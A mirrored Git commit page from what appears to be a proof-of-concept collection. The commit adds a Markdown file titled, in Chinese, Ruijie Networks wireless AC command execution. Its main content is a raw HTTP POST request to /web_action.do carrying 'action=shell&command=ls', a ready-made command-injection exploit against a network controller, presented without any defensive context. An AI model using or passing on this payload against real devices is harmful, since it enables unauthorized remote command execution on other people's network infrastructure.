mirror of
https://github.com/wooluo/POC00.git
synced 2026-07-02 17:25:35 +08:00
Create 锐捷网络无线AC命令执行.md
This commit is contained in:
15
锐捷网络无线AC命令执行.md
Normal file
15
锐捷网络无线AC命令执行.md
Normal file
@@ -0,0 +1,15 @@
|
||||
## 锐捷网络无线AC命令执行
|
||||
|
||||

|
||||
|
||||
## poc
|
||||
```
|
||||
POST /web_action.do HTTP/1.1
|
||||
Host:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
|
||||
|
||||
action=shell&command=ls
|
||||
```
|
||||
|
||||

|
||||
Reference in New Issue
Block a user